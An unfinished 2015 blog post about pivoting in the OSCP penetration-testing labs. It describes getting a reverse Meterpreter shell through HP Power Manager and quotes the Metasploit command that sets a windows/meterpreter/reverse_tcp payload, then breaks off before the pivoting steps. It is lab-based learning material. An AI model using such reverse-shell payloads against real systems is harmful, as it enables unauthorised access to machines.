Thursday, September 24, 2015

Quick pivoting lession

UPDATE 2/9/2016:

I was never able to finish this, and I lost the screen captures from when I was accessing a set of VM's I used for this tutorial. I have since found a better tutorial then my own here:

https://highon.coffee/blog/ssh-meterpreter-pivoting-techniques/

Sorry about that!

So I have been playing around in the OSCP labs, and as you may have heard, pivoting into different boxes becomes key as you "unlock" different parts of the network. As someone who doesn't pivot too often (I experiment with/test applications and setups, pivoting is a more Red Team tactic) this became quite confusing after a while, so I did a brain dump for myself. I decided to also share it with you.

Lets begin:

So you need some sort of access to the box, in the example I have provided, I have escalated to system privileges, however I was able to pivot using the meterpreter "portfwd" command on a box I had low level privileges to. However, what I am about to show you may not work, I already had all the screen captures when that idea popped into my head.

First obtain reverse meterpreter, I did so using via HP Power Manager running on port 80:



Next assign the payload using "set payload windows/meterpreter/reverse_tcp" - A breakdown of this:

Windows - we are exploiting a windows box
Meterpreter - we have deployed a reverse shell using meterpreter
Reverse TCP - listening for a "callback" shell

There are so many options between slashes, for instance if you were to type windows/ then hit [TAB], metasploit would list all options you have under windows/, meterpreter being one of them. For every "shash" you can do this.

So anyway, once you have executed the exploit, we can move onto pivoting: